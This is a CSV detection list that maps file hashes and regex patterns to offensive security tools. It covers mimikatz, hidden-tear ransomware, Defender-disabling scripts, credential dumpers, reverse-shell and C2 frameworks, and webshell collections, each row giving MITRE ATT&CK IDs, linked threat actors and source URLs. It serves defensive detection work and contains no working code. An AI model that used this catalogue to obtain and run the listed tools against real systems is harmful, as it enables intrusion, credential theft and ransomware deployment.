"*19804c0341ec2408b025626ac9259438f9c403104f155eedfa9b2395d85490b3*",".{0,1000}19804c0341ec2408b025626ac9259438f9c403104f155eedfa9b2395d85490b3.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","22535"
"*19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618*",".{0,1000}19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","nsudo.exe","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","22536"
"*198a1a3d69ff345e90ee64c3b437c7face55537cbe18b40506d54f5c489bca68*",".{0,1000}198a1a3d69ff345e90ee64c3b437c7face55537cbe18b40506d54f5c489bca68.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22537"
"*198a5ea52dda1eeca520c018ef7b21a217ea3a5ab7a3f07327e5ba0f172fd33b*",".{0,1000}198a5ea52dda1eeca520c018ef7b21a217ea3a5ab7a3f07327e5ba0f172fd33b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22538"
"*198dc4828f294ed26c63eaf2c0d38e2d7a21db41fe31ce988d9139ea2245f0ea*",".{0,1000}198dc4828f294ed26c63eaf2c0d38e2d7a21db41fe31ce988d9139ea2245f0ea.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","22539"
"*1990a0005ec6cd1b0cbfaa53cb51f27622f17e14df230215cb9921e1b2552a47*",".{0,1000}1990a0005ec6cd1b0cbfaa53cb51f27622f17e14df230215cb9921e1b2552a47.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22540"
"*199c57a85711459c0b0fbc8883b19829cec8c64588f50bb4a6b2611f6ad4d62b*",".{0,1000}199c57a85711459c0b0fbc8883b19829cec8c64588f50bb4a6b2611f6ad4d62b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22541"
"*19a3e58ea39c3de292defd823d99bc5e5a01b6d12e755401178854aaf1c644d5*",".{0,1000}19a3e58ea39c3de292defd823d99bc5e5a01b6d12e755401178854aaf1c644d5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22542"
"*19a43d7ebc516f2344e6ffac66205d54cbde907e2eb1fb6171934d292524c5c7*",".{0,1000}19a43d7ebc516f2344e6ffac66205d54cbde907e2eb1fb6171934d292524c5c7.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22543"
"*19aa5edc4fd83677bf6af63d5950707a6425a1550ef47ba8b00d629d95382750*",".{0,1000}19aa5edc4fd83677bf6af63d5950707a6425a1550ef47ba8b00d629d95382750.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22544"
"*19b43b756288d54603b5f435dd5f8a19cba1e3d90db3502246f1d314a917e4b4*",".{0,1000}19b43b756288d54603b5f435dd5f8a19cba1e3d90db3502246f1d314a917e4b4.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22545"
"*19bab15a34d5ad838ccf4d187eb40379c335fa56446d0f9621865b2767d4ac7d*",".{0,1000}19bab15a34d5ad838ccf4d187eb40379c335fa56446d0f9621865b2767d4ac7d.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A","22547"
"*19c09fad30c786cc22fb38d3f97021c0b35aaa9cd288d44970a45b5d1cb86070*",".{0,1000}19c09fad30c786cc22fb38d3f97021c0b35aaa9cd288d44970a45b5d1cb86070.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22548"
"*19c66cdf6c01ddd42f8cfef1e843ee5f8d929b05135190e9ce0c988180e7439a*",".{0,1000}19c66cdf6c01ddd42f8cfef1e843ee5f8d929b05135190e9ce0c988180e7439a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22550"
"*19c95ad5cf50f8c8273fcd4179c4878ebede832f9234955ac4fd4233b5b6a693*",".{0,1000}19c95ad5cf50f8c8273fcd4179c4878ebede832f9234955ac4fd4233b5b6a693.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22551"
"*19cce61cee800661797745070ba28b0c3b7ca2b3709d883b654a9a6e01535503*",".{0,1000}19cce61cee800661797745070ba28b0c3b7ca2b3709d883b654a9a6e01535503.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22554"
"*19d22a57efb66f96f7c8aa0650cc42a93bda9074d263f37ad120f51061e6bbf1*",".{0,1000}19d22a57efb66f96f7c8aa0650cc42a93bda9074d263f37ad120f51061e6bbf1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22556"
"*19d2b32e9801a4f959ce59e251879d9a42ac749e2e702a8ceab2ddee2d71bbb1*",".{0,1000}19d2b32e9801a4f959ce59e251879d9a42ac749e2e702a8ceab2ddee2d71bbb1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22557"
"*19dc8d8108bab9207905b08b57193efc9fd4e13f2cb901c7ca1ffd727cd62e4a*",".{0,1000}19dc8d8108bab9207905b08b57193efc9fd4e13f2cb901c7ca1ffd727cd62e4a.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22559"
"*19e2bd43425bcc1602df3db4fbd0775a29d70d24ae5ff139a1fefcfecdd79e40*",".{0,1000}19e2bd43425bcc1602df3db4fbd0775a29d70d24ae5ff139a1fefcfecdd79e40.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22560"
"*19e7a5fd08ffa93823b623f349a5922b026253d535381ced0ab0e107d1a67069*",".{0,1000}19e7a5fd08ffa93823b623f349a5922b026253d535381ced0ab0e107d1a67069.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22563"
"*19f0c96e4b201d75902e2eb10fdeb4aba4fe00f7f5bc897097c1f3f8262fca47*",".{0,1000}19f0c96e4b201d75902e2eb10fdeb4aba4fe00f7f5bc897097c1f3f8262fca47.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22567"
"*19f46bd0cecc1c03859e2a19b2041f6538f4e43aa3124b3eaaec00767381935f*",".{0,1000}19f46bd0cecc1c03859e2a19b2041f6538f4e43aa3124b3eaaec00767381935f.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","22568"
"*19f900f1332f1cb5895c079d90c982f7eae6cb67f989116a3cbba5101fbbe9b1*",".{0,1000}19f900f1332f1cb5895c079d90c982f7eae6cb67f989116a3cbba5101fbbe9b1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","22569"
"*1a0cd260249bb72d4c8cee640bc880c4ddb20609f0927114cb8f655bd9311aac*",".{0,1000}1a0cd260249bb72d4c8cee640bc880c4ddb20609f0927114cb8f655bd9311aac.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","22572"
"*1a187b6f85a5db0e62f10fcc40e5a212bb19cf6b3713b1def3ad90670315093c*",".{0,1000}1a187b6f85a5db0e62f10fcc40e5a212bb19cf6b3713b1def3ad90670315093c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22573"
"*1a1be3746ab4055e51557ec20f236da58a4dcbe1a523c8f5a2cd5dc97e699533*",".{0,1000}1a1be3746ab4055e51557ec20f236da58a4dcbe1a523c8f5a2cd5dc97e699533.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22577"
"*1a1c3d4c9b4d634ef0f741a0fe610935f6c5c0cf2c0cfc2a4a6d8b3702731b1b*",".{0,1000}1a1c3d4c9b4d634ef0f741a0fe610935f6c5c0cf2c0cfc2a4a6d8b3702731b1b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22578"
"*1a26c5a16b9601d79e53c830cfb5e339b6629d3e1d1d4ceb2993c7ff48734c60*",".{0,1000}1a26c5a16b9601d79e53c830cfb5e339b6629d3e1d1d4ceb2993c7ff48734c60.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","22580"
"*1a279f5df4103743b823ec2a6a08436fdf63fe30*",".{0,1000}1a279f5df4103743b823ec2a6a08436fdf63fe30.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","22581"
"*1a3c4069-8c11-4336-bef8-9a43c0ba60e2*",".{0,1000}1a3c4069\-8c11\-4336\-bef8\-9a43c0ba60e2.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","#GUIDproject","module id","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","22585"
"*1a3d0a8e65633283bb4e116282eaa271027dae9fb3b3658918198bbec4dd6b94*",".{0,1000}1a3d0a8e65633283bb4e116282eaa271027dae9fb3b3658918198bbec4dd6b94.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22586"
"*1a4a751f7044db4952d7e6607f24ade9ebbddbf2c6665de8cae3e7027df28dd2*",".{0,1000}1a4a751f7044db4952d7e6607f24ade9ebbddbf2c6665de8cae3e7027df28dd2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22589"
"*1a500fbb73dca02d86318499781d5932bf8e66471e98a9d543904e661fa87c19*",".{0,1000}1a500fbb73dca02d86318499781d5932bf8e66471e98a9d543904e661fa87c19.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22590"
"*1a51e5f891a81351f0e0bdc2bca6c2d4aaa0bc07e0a313b2cec8e77a63d236a1*",".{0,1000}1a51e5f891a81351f0e0bdc2bca6c2d4aaa0bc07e0a313b2cec8e77a63d236a1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22592"
"*1a524806875110320dacb05bb8a00bbe07f8618ff23a82effad887df9952f459*",".{0,1000}1a524806875110320dacb05bb8a00bbe07f8618ff23a82effad887df9952f459.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","22593"
"*1a550baec33973542f4a634762c680be12e21c3c91eb62e68558bfb5c96bbf5e*",".{0,1000}1a550baec33973542f4a634762c680be12e21c3c91eb62e68558bfb5c96bbf5e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22596"
"*1a55475f6cdba11f604d7006993a060ca4301fa8830d51f8c30cc244ec50b471*",".{0,1000}1a55475f6cdba11f604d7006993a060ca4301fa8830d51f8c30cc244ec50b471.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22597"
"*1a571ac5b806ffce2605b57753f74653ddb392e5afdb0e49c3e9e8d76e561568*",".{0,1000}1a571ac5b806ffce2605b57753f74653ddb392e5afdb0e49c3e9e8d76e561568.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#filehash","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","22599"
"*1a57eb11c69b6af09823fc2ffe4fdaa6b70142378706af50609ba9ef92c33627*",".{0,1000}1a57eb11c69b6af09823fc2ffe4fdaa6b70142378706af50609ba9ef92c33627.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22600"
"*1a661c04442e03afed5683e5d92798b9be628e197ba047ac45b7d831444fc3fe*",".{0,1000}1a661c04442e03afed5683e5d92798b9be628e197ba047ac45b7d831444fc3fe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22602"
"*1a6f0316931108a810daf959016373747a6017c62c2b1efb7ee049bad6961b19*",".{0,1000}1a6f0316931108a810daf959016373747a6017c62c2b1efb7ee049bad6961b19.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22604"
"*1a7ef3d45e179cdfc60a891b790f4310c273f0198d330f514ae213a7c4865f67*",".{0,1000}1a7ef3d45e179cdfc60a891b790f4310c273f0198d330f514ae213a7c4865f67.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22606"
"*1a8443e9b45e5a141d9009fb1f3fb762642b72917649b8bd98b1558edb2fcdcf*",".{0,1000}1a8443e9b45e5a141d9009fb1f3fb762642b72917649b8bd98b1558edb2fcdcf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22607"
"*1a8630762516e988f1ffb834e1e345c44d8b38d59dfba65ebd36d70d67241014*",".{0,1000}1a8630762516e988f1ffb834e1e345c44d8b38d59dfba65ebd36d70d67241014.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22608"
